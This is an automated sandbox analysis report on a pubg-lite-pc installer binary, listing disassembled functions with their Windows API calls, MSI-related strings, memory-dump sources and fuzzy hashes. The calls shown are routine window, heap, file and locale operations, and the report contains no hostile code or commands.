                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window$CreateLongRect
                                                                                                • String ID: tooltips_class32
                                                                                                • API String ID: 1954517558-1918224756
                                                                                                • Opcode ID: 30713b41a661258a1268fc3e9a274263d3282e7630ba3094a2d82de39795e318
                                                                                                • Instruction ID: 9807ea3f75964cb0546f1789121d848dc3e84393ab7139f2e0087cb22bad3bdc
                                                                                                • Opcode Fuzzy Hash: 30713b41a661258a1268fc3e9a274263d3282e7630ba3094a2d82de39795e318
                                                                                                • Instruction Fuzzy Hash: D8A13C71A00619EFDB15CFA8CD59BAEBBF9FF08700F14412AE516EB290D774A905CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00952FD0 Relevance: 16.8, APIs: 11, Instructions: 294windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0095301D
                                                                                                • GetWindowRect.USER32(?,?), ref: 0095303C
                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 009530BA
                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 00953157
                                                                                                • GetWindowRect.USER32(?,?), ref: 00953176
                                                                                                • SendMessageW.USER32(?,0000007F,00000000,00000000), ref: 009531DD
                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 00953200
                                                                                                • GetWindowRect.USER32(?,?), ref: 0095321F
                                                                                                • GetWindowRect.USER32(?,?), ref: 009530D9
                                                                                                  • Part of subcall function 00954160: GetWindowRect.USER32(?,?), ref: 00954199
                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 00953290
                                                                                                • GetWindowRect.USER32(?,?), ref: 009532AF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Rect$Long$MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 947902118-0
                                                                                                • Opcode ID: a403a085b1812c85732d66b5036400eded8cf9f11a4f6c05ee4e2c1cf074618a
                                                                                                • Instruction ID: b61b98e40b7af57b35ffd029d5c57fcd1efeab41ccd2d7baec5d2bf4343a5527
                                                                                                • Opcode Fuzzy Hash: a403a085b1812c85732d66b5036400eded8cf9f11a4f6c05ee4e2c1cf074618a
                                                                                                • Instruction Fuzzy Hash: 55B14B716087069FC714DF29D844B5BBBE8EF99701F404A1EF985C71A1DB30E988CB52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0092D460 Relevance: 16.8, APIs: 11, Instructions: 293nativememoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowLongW.USER32(80070216,000000EC), ref: 0092D54B
                                                                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0092D55B
                                                                                                • SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 0092D566
                                                                                                • NtdllDefWindowProc_W.NTDLL(00000000,?,00000001,80070216,?,00000000,?,?,80070216), ref: 0092D574
                                                                                                • GetWindowLongW.USER32(00000000,000000EB), ref: 0092D582
                                                                                                • SetWindowTextW.USER32(00000000,00AA9988), ref: 0092D621
                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000,?,00000000), ref: 0092D658
                                                                                                • GlobalLock.KERNEL32(00000000,?,00000000), ref: 0092D666
                                                                                                • GlobalUnlock.KERNEL32(?,?,00000000), ref: 0092D68A
                                                                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0092D6EF
                                                                                                • NtdllDefWindowProc_W.NTDLL(00000000,?,F4D3B90A,00000000), ref: 0092D73D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Long$Global$NtdllProc_$AllocLockTextUnlock
                                                                                                • String ID:
                                                                                                • API String ID: 3555041256-0
                                                                                                • Opcode ID: 1843f38306f438d04fc8d2271d588e012bd4041c1619d7839b6fb36b346acf70
                                                                                                • Instruction ID: 7a2eb8ab4635d8519c28271df5bcfb69c5021b1df023ef4fd57c64ad45f526ae
                                                                                                • Opcode Fuzzy Hash: 1843f38306f438d04fc8d2271d588e012bd4041c1619d7839b6fb36b346acf70
                                                                                                • Instruction Fuzzy Hash: 14A1E1B1902225ABDB10DFA4EC48FAFBBBCEF55310F140618F815A7295DB789D04CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00960860 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 268windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00960A84
                                                                                                • SendMessageW.USER32(00000000,00000439,00000000,0000002C), ref: 00960A94
                                                                                                • SendMessageW.USER32(00000000,00000421,00000000,?), ref: 00960AA9
                                                                                                • SendMessageW.USER32(00000000,00000418,00000000,0000012C), ref: 00960ABA
                                                                                                • SendMessageW.USER32(?,000000D6,-00000001,00000000), ref: 00960ACD
                                                                                                • GetWindowRect.USER32(?,?), ref: 00960AFB
                                                                                                  • Part of subcall function 00961CB0: CreateWindowExW.USER32(?,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00961D0F
                                                                                                  • Part of subcall function 00961CB0: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,?), ref: 00961D28
                                                                                                  • Part of subcall function 0092F630: SetWindowLongW.USER32(?,000000FC,00000000), ref: 0092F666
                                                                                                • SendMessageW.USER32(00000000,00000412,00000000), ref: 00960B5D
                                                                                                • SendMessageW.USER32(00000000,00000411,00000001,0000002C), ref: 00960B6D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window$CreateLongRect
                                                                                                • String ID: ,
                                                                                                • API String ID: 1954517558-3772416878
                                                                                                • Opcode ID: 3f8db3c484bd16b32a51234e569934718a80a298cf376daa2cb3d64de6e4acd2
                                                                                                • Instruction ID: fb25c259cf97f3917272dc49929cd6549a00d078edb79fd98d8456bb2206b747
                                                                                                • Opcode Fuzzy Hash: 3f8db3c484bd16b32a51234e569934718a80a298cf376daa2cb3d64de6e4acd2
                                                                                                • Instruction Fuzzy Hash: 2DB119B1E002199FDB14CFA9C985B9EBBF8FF48300F50862AE515EB291D774A944CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00941FB0 Relevance: 14.2, Strings: 11, Instructions: 400COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandle
                                                                                                • String ID: GetFontHeight$MessageBox$MsiEvaluateCondition$MsiGetBinaryPath$MsiGetBinaryPathIndirect$MsiGetBytesCountText$MsiGetFormattedError$MsiGetProperty$MsiPublishEvents$MsiResolveFormatted$MsiSetProperty
                                                                                                • API String ID: 2962429428-3153392536
                                                                                                • Opcode ID: 6b11db67c3369d52f412984e62f6091b5abda5337544898b4e123c50cde8b338
                                                                                                • Instruction ID: 516e0ea1c75ea90f1c6090178caa3fadee8bef658e7c1b41c899a7eb478a5ecc
                                                                                                • Opcode Fuzzy Hash: 6b11db67c3369d52f412984e62f6091b5abda5337544898b4e123c50cde8b338
                                                                                                • Instruction Fuzzy Hash: 0C22F4B0C11369DBDB61CFA4C894BCAB7B0BF58314F1042DAD149BB281EB746A95CF94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0097ED60 Relevance: 13.9, APIs: 9, Instructions: 424windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • IsWindow.USER32(?), ref: 0097EDAD
                                                                                                • DestroyWindow.USER32(?), ref: 0097EDBA
                                                                                                • IsWindow.USER32 ref: 0097EE4A
                                                                                                • SendMessageW.USER32(?,00000407,00000000,?), ref: 0097EE6F
                                                                                                  • Part of subcall function 0097F6A0: lstrcmpiW.KERNEL32(?,static), ref: 0097F716
                                                                                                  • Part of subcall function 0097F6A0: GetWindowLongW.USER32(?,000000F0), ref: 0097F72B
                                                                                                  • Part of subcall function 0097F6A0: SetWindowLongW.USER32(?,000000F0,00000000), ref: 0097F73F
                                                                                                  • Part of subcall function 0097F6A0: GetWindowLongW.USER32(?,000000F0), ref: 0097F74A
                                                                                                  • Part of subcall function 0097F6A0: LoadCursorW.USER32(00000000,00007F89), ref: 0097F78C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Long$CursorDestroyLoadMessageSendlstrcmpi
                                                                                                • String ID:
                                                                                                • API String ID: 668490028-0
                                                                                                • Opcode ID: faef03dea2b2e443ff72ec8cb469f64d94df7913c8c6f95edfbf25b64a890e12
                                                                                                • Instruction ID: 194f9b6ab459bc51f8ae60bc5cc40a92a7d4e3e7d1df2bcd652874ca5ebed280
                                                                                                • Opcode Fuzzy Hash: faef03dea2b2e443ff72ec8cb469f64d94df7913c8c6f95edfbf25b64a890e12
                                                                                                • Instruction Fuzzy Hash: 0FE103326043058FDB31CF18D8987AAB7E9FF55321F00892AF88AD76A0D771E854CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0096F740 Relevance: 10.9, APIs: 7, Instructions: 352windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00928FC0: RtlAllocateHeap.NTDLL(?,00000000,?,F4D3B90A,00000000,00A65840,000000FF,?,?,00AF91CC,?,009EAA18,80004005,F4D3B90A), ref: 0092900A
                                                                                                  • Part of subcall function 00995990: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037,?,?,?,000000EF,?,0093DCD8,00000000,80004005), ref: 009959FB
                                                                                                  • Part of subcall function 00995990: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00995A2B
                                                                                                • GetWindowLongW.USER32(?,000000FC), ref: 0096F8C1
                                                                                                • SetWindowLongW.USER32(?,000000FC,?), ref: 0096F8CF
                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 0096F91B
                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 0096F9E6
                                                                                                • SendMessageW.USER32(?), ref: 0096FA34
                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 0096FA43
                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 0096FA50
                                                                                                  • Part of subcall function 0099CFA0: GetLastError.KERNEL32(F4D3B90A,?,00000000), ref: 0099D00D
                                                                                                  • Part of subcall function 00973130: SendMessageW.USER32(00000234,00001109,00000000,?), ref: 00973167
                                                                                                  • Part of subcall function 00971090: FreeLibrary.KERNEL32(?,F4D3B90A,-000002D8), ref: 009710DA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window$Long$AllocateErrorFreeHeapLastLibrary
                                                                                                • String ID:
                                                                                                • API String ID: 1003268960-0
                                                                                                • Opcode ID: ddc2594da10e95225ad80cbb10cdb1dbb2c48f535c63468508398b78d8491afc
                                                                                                • Instruction ID: 2352a896bc3f3ab318d509227d07dc06ba0fce0aeabd1eb30d90462886993a51
                                                                                                • Opcode Fuzzy Hash: ddc2594da10e95225ad80cbb10cdb1dbb2c48f535c63468508398b78d8491afc
                                                                                                • Instruction Fuzzy Hash: 10C1C031600615AFDB14DF68DC95FAEFBB5FF88310F104269F516AB2A1DB71A904CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00996A20 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 309windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 00996C37
                                                                                                • SendMessageW.USER32(?,00000443,00000000), ref: 00996CA1
                                                                                                • MulDiv.KERNEL32(?,00000000), ref: 00996CD8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSendWindow
                                                                                                • String ID: NumberValidationTipMsg$NumberValidationTipTitle$Segoe UI
                                                                                                • API String ID: 701072176-2319862951
                                                                                                • Opcode ID: a89e67d5447bb902b636713e98fbd8c2b5f9683576e1a0f59d38f3c19e5a0a4f
                                                                                                • Instruction ID: e6e6fb3776baf85ebe2b511bf822f90cf939e66dcea5093354b19e6ce47ef227
                                                                                                • Opcode Fuzzy Hash: a89e67d5447bb902b636713e98fbd8c2b5f9683576e1a0f59d38f3c19e5a0a4f
                                                                                                • Instruction Fuzzy Hash: B1C1CD71A00714AFEB14CF64CC45BEAB7F1FF89300F008699E556A72C1DB74AA49CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009EE850 Relevance: 9.2, APIs: 6, Instructions: 196fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(?,00000000,-00000010,?,F4D3B90A,?,00000000,00000000), ref: 009EE921
                                                                                                • FindNextFileW.KERNEL32(?,00000000), ref: 009EE93C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileFind$FirstNext
                                                                                                • String ID:
                                                                                                • API String ID: 1690352074-0
                                                                                                • Opcode ID: ca0110f60929b299f46cbef1e0c72123f7e575ea9a7f1edfbfff733058d9ff22
                                                                                                • Instruction ID: 6b0d7ad1577059f5e73658ed9409b1fa5adc2abe1993bc99fdbe26a8e79fd2fb
                                                                                                • Opcode Fuzzy Hash: ca0110f60929b299f46cbef1e0c72123f7e575ea9a7f1edfbfff733058d9ff22
                                                                                                • Instruction Fuzzy Hash: 72716C71901689DFDB11DFA9CD48BDEBBB8FF48310F148269E815AB291DB749E04CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009D99D0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 375COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 009292F0: GetProcessHeap.KERNEL32 ref: 00929345
                                                                                                • GetLogicalDriveStringsW.KERNEL32(00000064,?), ref: 009D9BD6
                                                                                                • GetDriveTypeW.KERNEL32(?), ref: 009D9BEA
                                                                                                • Wow64DisableWow64FsRedirection.KERNEL32(00000000,00000000), ref: 009D9DC2
                                                                                                • Wow64RevertWow64FsRedirection.KERNEL32(00000000,00000000), ref: 009D9E44
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Wow64$DriveRedirection$DisableHeapLogicalProcessRevertStringsType
                                                                                                • String ID: ]%!
                                                                                                • API String ID: 4157823300-1069524040
                                                                                                • Opcode ID: 28cfb44017fc3a6b9d559b0904afd917687d9d01ac6b2c10e16141b8f3142fda
                                                                                                • Instruction ID: 1b6a87583ddcadbb158647ea0df655de994792549d7b62d95013eaccd70548bf
                                                                                                • Opcode Fuzzy Hash: 28cfb44017fc3a6b9d559b0904afd917687d9d01ac6b2c10e16141b8f3142fda
                                                                                                • Instruction Fuzzy Hash: DAE1B071900659DFDB24EF68CC84BADF7B5AF45310F1481EAE419A7292DB709E84CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A432EF Relevance: 9.0, APIs: 6, Instructions: 41memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000C,00A4320B,00000000,?,00A433A3,00000000,?,?,0092F3F4,?), ref: 00A432F1
                                                                                                • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,?,?,0092F3F4,?), ref: 00A43318
                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,0092F3F4,?), ref: 00A4331F
                                                                                                • InitializeSListHead.KERNEL32(00000000,?,?,0092F3F4,?), ref: 00A4332C
                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,0092F3F4,?), ref: 00A43341
                                                                                                • HeapFree.KERNEL32(00000000,?,?,0092F3F4,?), ref: 00A43348
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
                                                                                                • String ID:
                                                                                                • API String ID: 1475849761-0
                                                                                                • Opcode ID: ba1402b37fc501802751a683a60eafd04a1690a714ba7ea8df3a39193adbeb4b
                                                                                                • Instruction ID: 914a2e4c60c4745cae3a435d177ae4ac49066a40ef7066819d56bb74b3567279
                                                                                                • Opcode Fuzzy Hash: ba1402b37fc501802751a683a60eafd04a1690a714ba7ea8df3a39193adbeb4b
                                                                                                • Instruction Fuzzy Hash: 4CF062767902029BDB20DFA9AD0CB1A77ECBB98B16F04042AFA45D7350DF70E4068B61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0096CBC0 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 402windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowLongW.USER32(0000000C,000000EC), ref: 0096CE33
                                                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0096D195
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: LongMessageSendWindow
                                                                                                • String ID: $$rtlo
                                                                                                • API String ID: 3360111000-2671091646
                                                                                                • Opcode ID: 498dc8383075f077164e464e697d73f923dcd0de698f2d07cb846a142c048cab
                                                                                                • Instruction ID: 7f2fd26b6c25230dfaaf3736dfa500a5fced967a29f32ccae80244bfef0de46f
                                                                                                • Opcode Fuzzy Hash: 498dc8383075f077164e464e697d73f923dcd0de698f2d07cb846a142c048cab
                                                                                                • Instruction Fuzzy Hash: 5F12DE70E01258DFDB10DF68C949BDEBBB0BF55304F148199E449AB292DB74AE88CF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009D28A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 009292F0: GetProcessHeap.KERNEL32 ref: 00929345
                                                                                                • GetLocaleInfoW.KERNEL32(?,00000002,00AA9988,00000000), ref: 009D2911
                                                                                                • GetLocaleInfoW.KERNEL32(?,00000002,009D23E7,-00000001,00000078,-00000001), ref: 009D294D
                                                                                                • RegCloseKey.ADVAPI32(?,?,80004005,F4D3B90A,?,?,?), ref: 009D29BB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
